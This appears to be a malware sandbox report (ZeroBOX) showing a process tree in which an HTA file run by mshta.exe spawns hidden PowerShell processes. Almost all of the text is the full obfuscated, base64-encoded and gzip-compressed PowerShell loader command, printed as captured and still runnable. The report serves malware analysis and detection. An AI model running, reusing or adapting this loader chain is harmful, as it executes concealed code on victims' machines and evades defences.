| ZeroBOX

Behavioral Analysis

Process tree

  • mshta.exe "C:\Windows\System32\mshta.exe" C:\Users\test22\AppData\Local\Temp\javad.hta

    2544
    • powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -w hidden -e aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAnAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAnAH0AZQBsAHMAZQB7ACQAYgA9ACQAZQBuAHYAOgB3AGkAbgBkAGkAcgArACcAXABzAHkAcwB3AG8AdwA2ADQAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACcAfQA7ACQAcwA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAUwB0AGEAcgB0AEkAbgBmAG8AOwAkAHMALgBGAGkAbABlAE4AYQBtAGUAPQAkAGIAOwAkAHMALgBBAHIAZwB1AG0AZQBuAHQAcwA9ACcALQBuAG8AcAAgAC0AdwAgAGgAaQBkAGQAZQBuACAALQBjACAAJgAoAFsAcwBjAHIAaQBwAHQAYgBsAG8AYwBrAF0AOgA6AGMAcgBlAGEAdABlACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAKAAoACcAJwBIADQAcwBJAEEATQBKAHUAWABHAFkAQwBBADcAVgBXACsAMAAvAGIAUwBCAEQAKwAvAGEAVAArAEQAMQBZAFYAeQBiAFkAYQBZAHUAZABSAEsARQBpAFYAYgB1ADIAUQBCACsAQwBRAFkASgBLAFEAcABOAEYAcABhADIALwBzAEoAVwB0AHYAcwBEAGUARQAwAE8AdgAvAGYAcgBPAE8AegBlAE8AQQBpAGoAdQBwAGwAZwBMADcAbQBKAG0AZAAvAGUAYQBiAG0AVgAyAHMAWQAwADkAUQBIAGkAdgB4AGMAcQBEADgAKwBQAEMASABrAG4AOQA5AG4ATwBCAEkAMABVAHEAKwBXAFYAWgBLAHkAYQBYACsAdQBGAE4AYQBWAEoAVwB2AGkAagBaAEQAcQAxAFcAVABSADUAagBHADgANgBNAGoAZQA1ADAAawBKAEIAYQA3AGUAYQBWAE4AQgBFAHAAVABFAG4AMQBuAGwASwAnACcAKwAnACcAUwBhAHIAdgB5AHQAagBFAE8AUwBrAEwAewAxAH0AegA3ADkAZgBFAEUAOABvAFAAcABmAFIAWABwAGMAewAxACcAJwArACcAJwB9ADQAZAA4AHgAeQBzAGEAMgBOAHYAWgBBAG8AZQB5AGoAMgA1AGQANABaADkANwBEADAAcQBlAEsAdQBHAEIAVwBhACsAdQAyAGIAcQBzAC8AMgBxAHYAUABLADgAYwAwAGEAcwAxAFIAVAB7ADEAfQBXADAAcQBTAEYAVAB4AEcAVgBOADEANQBhAGMAdQBEADcAegBjAHIAbwBpAG0ATwB0AFIATABlAE0AbwBYAG8AagBLAG0AYwBiADEAVwBHAGMAWQBwAFgAcABBAGUAVwBMAHMAbABEAHsAMgB9AEUAewAyAH0AOQAxAE0AVgByAHYASgA0AG0AWQBTAEkAZABSAEwATABPADAAawBqAE8AeABGAE4AewAyAH0AVwBFAC8ANAAnACcAKwAnACcAUgA3AHkALwBZAFMAawBxAFYAcABXAFoAdABMADgAYgBEADcALwBVADUAdgBsAFoAMQArAHMAWQAwAEUAagBVAHUAbgBHAGcAaQBSADgANQBaAEwAawBsAG4AbwBrAHIAWABSAHcANwBEAE4AeQBRAFIAWgB6ADAASABKAEYAUQB1AE4AZwByAHUAcwBnAGQAcwB1AFgAUgBDAHYARgBhADgAYgBLAHkAbgA4AHgAbwAvAFgASQBwAGsARAB1AHYAVQByAGEAVQB5AFcAUQA2AG8AdABFAEwAMABNAHcAWAAnACcAKwAnACcAOQB6AFMAJwAnACsAJwAnADQAZgA2AGEAawBaADIAZQArAG8AcQBiAEUASAA0AGQAdgB7ADIAfQAwAEYAQQBMAGkAZgBFAHIAdABGAFEAWgBuAGwALwBpAHUATQBlAFYAdwBvAHYAbABtADIAUQA4AEIAWAByAGMAOQBUAG0AcQAnACcAKwAnACcAbAArAFYAJwAnACsAJwAnAFkAQgBYAEQAcAB5AEwAQgBVACsAMgBNAEMAMQBkAEoAbQB1AGkAegB4ACsAUQBWAGsAcgBZAEwAYgAvAFgAVgByAFYAUQBsAEcAcQBuAHMARABBAGIAYwBlAHIAUABIADkAVwBmAHgAYgB5AFUANwBMAE4AQQBDAHIAewAxAH0ATgA0AEMAWgBaADAASgBnADAAdAB6AEcATwBxAEYAZQBRAFYASABzAHQARgBHAFQAQgBTAEkAWgBHAHAAUgBEAHIAZwBYACsAYQBtAG0AOABRAHYAMABrAFkAQwBiAEMAUQA4AEUAcABHAHYARgBBADcAagBxAHsAMgB9ADQAMABMAFgAVwBsAFAAawBrAFEAUgA2AEUATQB3AFcAdgBJAE4ATAA2AGMAMgBkADIARQBkAFAAVQBiAHUAeQBRAEMASwBEAGIAegBZAEcAaQBwAFEAVwAnACcAKwAnACcAawBCAGkAbQBrADgAewAxAH0AVABZAEYAcQBmAEwATwBRAGkAcABOAHMATgBwAFcAbABiADYAYQA4AHsAMgB9AE4AcgA2AHkANABCAEQAUABpAGwAeABVAFUAcAB6AFQAZgBRAG0AdgBCAHMANgBIADYANgBLADYAegBaAG8ASgA2AE8AJwAnACsAJwAnAEIAVwBGAHUAYgBuACsATAB6AGoAegBZADIAMABlAHAAeQBKAFoAZQB4AEIAVQBnAE8ARABTAFgAUgBHAFAAWQBpAFkAUgBLAFMAcwBkADYAewAyAH0ATgByADYAOQBLAGcATwBGADUAOQAnACcAKwAnACcARgBRADgAYgBNAHcAWgBKAEEANQBaAHUASQBSADYAdwBJAG4ARgB3AHsAMgB9AGEAUgBLAEEAcAA0AEMATABmAFMASwBTADAAUQB7ADEAfQBXAGoARQBTAGcAVQBSAFcASwBWAG8ATQBCADEAQQBYADgAcwBUAEkAbQBJAFUAJwAnACsAJwAnAEQANABxAHQAdgB1AEYAbABrAHcASQA3AHUARQBwAGMAQwBrAEMAZABPAFEAcgBCAGQAeABrAFYAWgBHAGQARgBFAFEATgAyAFIARwBPAFAAVAAvACsASABCAHkAMgBxAFQAdQBXAEkAbgBKAEEAKwBNAFYAbQBUAFcAegBOAG8ASwBTAGYANwBTADkAYwBYAG4AVABWAHQAJwAnACsAJwAnAFMATgBNAGMAbgBRAHkATQBSAGcARQBRAHIANABaAEcARgBVADcATABmADIAQgBVAFgANwBhAE4AeABUAHYAcwBJAHYAawBrAHsAMQB9AFoAbwA1AC8AcwBxAFQAVgA3AGcAWgArAEQAdgB5AEcAegBRAFAALwA5AE8AUwA2AFkAOQBCADYAbAB6AHUAZQBuAGYAYgBiAHIAUwArAEkAYgBvAEsATgA5ADYAVwBIAFAAUAAvAEUASgA0AGYAdQBxAEMASABjADQANgA2AHcAKwA2AGcAegBvAEsAYgBWAEMARAB7ADEAfQAnACcAKwAnACcATAB2AEoAVABqAGEAewAyAH0AQgBRAE0ANQBnAGcAdgB6AGMASQBQAFcAYgAyAGoANgBPAHoAWABqAGUAOQBNAHoAYQBkAHMAZQBNADEAcgBmAHQATgBMAFEAVwBpAE4AewAyAH0AcQBkAEsAeABQAFYANgA0AHsAMQB9AHoAdQByAGsARQA4AEMAYQBnAHQAdwBTAGQAaQBHADcAdQB6AG0AQQBNAFYAZgBUADgAegBPAHEAbQBsAHQAbABsAHgAeQBmADIAeABmAGQAeAByAFQAVQBkAHMANAA3AFIAYQBJAFcATABNAFUALwBkAC8AVQBuAFQATQBJAHgARABIAHoAZQBkAEwAVQBJAFcAOQArAHYATwA5AHEAcAA2AHcAUwA4ADcAWABtAFEAMQBZAG0ANABjADIAbwAwAGwATwBrAGIASQBqAG8AOQBIAEwAWQB1AGYAVABxAHcARQA5AFkAMABSAEQAbABaADgARgBJAFcAbgBuAFYAcABnAEkAKwAnACcAKwAnACcAVABYAEsAWgBrAE8AewAyAH0AaQAxAHIATQBHAHsAMgB9AFoAYQBOAGkAKwB2AG0AawBlAEcAbwBGAHgATwBMADcAQwBvAFQAVQBlADEAZQB7ADIAfQAwAGQAWABVAFIAdwByAHkAMQA2AFEAeABPAEQAYgBQAFIAOQBjAGsAOQBuADIANABBAHUARABaAEgATwBMAGcAQQBtAGMAQwB1AGUAZQBFAEMAWgBKAHEAZgBrAFAAVwBwAHgAOQBNAGEAWABsAG8AYwBXAFMARABUAG0AdAA2AGcAZABqAHsAMgB9AFoAdABmAG8ATQA5AGkAKwBIAE4AWQA1AEcAcgBIAGUARgAwAGQAbAAwADIAegBLACcAJwArACcAJwBNADYAcQBUAGYAUQBCADIAVABqADkAcwBCAEcAbwBBACcAJwArACcAJwA0AEQAcQB3AEIAUgB1AGwAdAA4ADcANQBwAFYARQBjACsAOQA4AGUAZgBlADUATwBGAE0AYgBwAGkAQgAwAGIAVABIAHYAVABEAEsAewAxAH0AbABuAFkAeABYAEoAdgA1AHQATwA4ADkAUwBiAFYAagBmAGUAKwBjAEcAWABzAHoARQBkAFIAUgB3AE4ARABXAFAAMABFAFYAZwB4AEcAOQBKAFkAMQBHAHYAegAnACcAKwAnACcAawBnAGcAYwBXAFQATQAvAC8ARgBIAGEAVwBQAGYAZABKADgAeAA0AHEAeABjADQATwBFAGwARAB6AEkAQQB4AFUATwBhAEwAdABHAHsAMQB9AHgAcABKAFUAWAA3AHoANgBuAFUAawBQAFQAWgBOADkAZgBrAGkAUQBtAEQAUABvAGwAZABOAFMAQwA3AG8AZwB4ADcAcwBtAHUAQQBWAFUAZQArAHQAVwB1AGkAOABpAG0ATgB1AHgAbQBMAHIAMAAyADAAcABVAEgAJwAnACsAJwAnAFEAZgAyAHgAbQB4AFIATABSADAAZABUAGMAQgBFAFMASwBHAE4AewAxAH0ANQBZAHoARQBnAFEAagBMADUAbAB7ADEAfQBkAE4ASwBFAFoAbQBIAGQAbQBJADAAdQBXADkAOQAvAE0ANQBxAHUAdAB0AHIATgBXAGwAdgAwAGsAdwArAGIAQgBQAHMAdgBzAGcAMABtADYAVQBEAFQAdAB0ACsATQBGAEQAdwBZAEIASgBlAHcAdAB4AE4ANABDAEQAdwA1AGUAUQBzAFcAQgBBAHIAaQByAEIAQgBKAEMAaQB7ADEAfQBQADIARgBNAEQAOABYAGcAOQBrAGUASQBZAGYAQQBGAGUARgB1ADgALwBrAFcAMAAnACcAKwAnACcASABTAEIAQwB6AHMAawBSAHUAbABKAEcAUQAvAGYAZABxAGYAUwAwAHYAZgBPAFkAewAyAH0ALwBLAHsAMQB9AFgAeQBrAHsAMgB9AGIAQwBQAC8ALwBYADEASABsAGMAKwA4AFgAdQB1ACsAewAyAH0AawBsAG4AZgB3AHYARgB7ADIAJwAnACsAJwAnAH0AKwB2AHYAQwBrAEUALwB5ACsAKwA0ADgAeABGAFMARABvAFEAbAAxAG0AWgBQAGQAUQBlAEEAMgBHAFAARgBtAGUAQgBEAGcATABEAGEAVABDAEkAdgAvAGsAbQAvAGwAOABMAGYAWgA2ADgAQQA3AEwAZQBzAE0ALwBZADEAcABVAEUANgBjAEwAQQBBAEEAewAwAH0AJwAnACkALQBmACcAJwA9ACcAJwAsACcAJwAzACcAJwAsACcAJwBoACcAJwApACkAKQApACwAWwBTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQApACkALgBSAGUAYQBkAFQAbwBFAG4AZAAoACkAKQApACcAOwAkAHMALgBVAHMAZQBTAGgAZQBsAGwARQB4AGUAYwB1AHQAZQA9ACQAZgBhAGwAcwBlADsAJABzAC4AUgBlAGQAaQByAGUAYwB0AFMAdABhAG4AZABhAHIAZABPAHUAdABwAHUAdAA9ACQAdAByAHUAZQA7ACQAcwAuAFcAaQBuAGQAbwB3AFMAdAB5AGwAZQA9ACcASABpAGQAZABlAG4AJwA7ACQAcwAuAEMAcgBlAGEAdABlAE4AbwBXAGkAbgBkAG8AdwA9ACQAdAByAHUAZQA7ACQAcAA9AFsAUwB5AHMAdABlAG0ALgBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6AFMAdABhAHIAdAAoACQAcwApADsA

      2636
      • powershell.exe "powershell.exe" -nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String((('H4sIAMJuXGYCA7VW+0/bSBD+/aT+D1YVybYaYudRKEiVbu2QB+CQYJKQpNFpa2/sJWtvsDeE0Ov/frOOzeOAijuplgL7mJmd/eabmV2sY09QHivxcqD8+PCHkn99nOBI0Uq+WVZKyaX+uFNaVJWvijZDq1WTR5jG86Mje50kJBa7eaVNBEpTEn1nlK'+'SarvytjEOSkL{1}z79fEE8oPpfRXpc{1'+'}4d8xysa2NvZAoeyj25d4Z97D0qeKuGBWa+u2bqs/2qvPK8c0as1RT{1}W0qSFTxGVN15acuD7zcroimOtRLeMoXojKmcb1WGcYpXpAeWLslD{2}E{2}91MVrvJ4mYSIdRLLO0kjOxFN{2}WE/4'+'R7y/YSkqVpWZtL8bD7/U5vlZ1+sY0EjUunGgiR85ZLklnokrXRw7DNyQRZz0HJFQuNgrusgdsuXRCvFa8bKyn8xo/XIpkDuvUraUyWQ6otEL0MwX'+'9zS'+'4f6akZ2e+oqbEH4dv{2}0FALifErtFQZnl/iuMeVwovlm2Q8BXrc9Tmq'+'l+V'+'YBXDpyLBU+2MC1dJmuizx+QVkrYLb/XVrVQlGqnsDAbcerPH9WfxbyU7LNACr{1}N4CZZ0Jg0tzGOqFeQVHstFGTBSIZGpRDrgX+amm8Qv0kYCbCQ8EpGvFA7jq{2}40LXWlPkkQR6EMwWvINL6c2d2EdPUbuyQCKDbzYGipQW'+'kBimk8{1}TYFqfLOQipNsNpWlb6a8{2}Nr6y4BDPilxUUpzTfQmvBs6H66K6zZoJ6O'+'BWFubn+LzjzY20epyJZexBUgODSXRGPYiYRKSsd6{2}Nr69KgOF59'+'FQ8bMwZJA5ZuIR6wInFw{2}aRKAp4CLfSKS0Q{1}WjESgURWKVoMB1AX8sTImIU'+'D4qtvuFlkwI7uEpcCkCdOQrBdxkVZGdFEQN2RGOPT/+HBy2qTuWInJA+MVmTWzNoKSf7S9cXnTVt'+'SNMcnQyMRgEQr4ZGFU7Lf2BUX7aNxTvsIvkk{1}Zo5/sqTV7gZ+DvyGzQP/9OS6Y9B6lzuenfbbrS+IboKN96WHPP/EJ4fuqCHc466w+6gzoKbVCD{1}'+'LvJTja{2}BQM5ggvzcIPWb2j6OzXje9MzadseM1rftNLQWiN{2}qdKxPV64{1}zurkE8CagtwSdiG7uzmAMVfT8zOqmltllxyf2xfdxrTUds47RaIWLMU/d/UnTMIxDHzedLUIW9+vO9qp6wS87XmQ1Ym4c2o0lOkbIjo9HLYufTqwE9Y0RDlZ8FIWnnVpgI+'+'TXKZkO{2}i1rMG{2}ZaNi+vmkeGoFxOL7CoTUe1e{2}0dXURwry16QxODbPR9ck9n24AuDZHOLgAmcCueeECZJqfkPWpx9MaXlocWSDTmt6gdj{2}ZtfoM9i+HNY5GrHeF0dl02zK'+'M6qTfQB2Tj9sBGoA'+'4DqwBRult875pVEc+98efe5OFMbpiB0bTHvTDK{1}lnYxXJv5tO89SbVjfe+cGXszEdRRwNDWP0EVgxG9JY1Gvz'+'kggcWTM//FHaWPfdJ8x4qxc4OElDzIAxUOaLtG{1}xpJUX7z6nUkPTZN9fkiQmDPoldNSC7ogx7smuAVUe+tWui8imNuxmLr020pUH'+'Qf2xmxRLR0dTcBESKGN{1}5YzEgQjL5l{1}dNKEZmHdmI0uW99/M5quttrNWlv0kw+bBPsvsg0m6UDTtt+MFDwYBJewtxN4CDw5eQsWBArirBBJCi{1}P2FMD8Xg9keIYfAFeFu8/kW0'+'HSBCzskRulJGQ/fdqfS0vfOY{2}/K{1}Xyk{2}bCP//X1Hlc+8Xuu+{2}klnfwvF{2'+'}+vvCkE/y++48xFSDoQl1mZPdQeA2GPFmeBDgLDaTCIv/km/l8LfZ68A7LesM/Y1pUE6cLAAA{0}')-f'=','3','h')))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))

        2808

Process contents

No process loaded Click on a process in the tree above to load its data.